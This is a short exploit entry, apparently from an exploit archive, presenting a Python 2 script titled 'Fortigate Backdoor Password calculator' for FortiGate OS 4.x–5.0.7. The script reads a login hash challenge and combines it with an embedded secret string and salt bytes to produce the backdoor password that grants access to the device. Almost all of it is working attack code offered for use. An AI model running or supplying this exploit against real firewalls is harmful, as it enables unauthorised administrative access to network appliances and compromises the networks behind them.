Simple python exploit that can be used to calculate the Fortigate backdoor password.
15a07d650ef557b68a8c9bfe847dca4bd3934895f748d892ea6a2e85799567ab
# Title : Fortigate Backdoor Password calculator
# Date : 24 March 2016
# Author : Rishabh Dangwal, original exploit by operator8203@runbox.com.
# Author Homepage : www.theprohack.com
# Author Email : admin@theprohack.com
# Vendor Homepage : www.fortinet.com
# Version : FortiGate OS Version 4.x - 5.0.7
import base64
import hashlib
print "Enter hash challenge " ; chash = raw_input()
pwdhash = hashlib.sha1()
pwdhash.update('\x00' * 12)
pwdhash.update(chash + 'FGTAbc11*xy+Qqz27')
pwdhash.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
fhash = 'AK1' + base64.b64encode('\x00' * 12 + pwdhash.digest())
print "password is %s" %fhash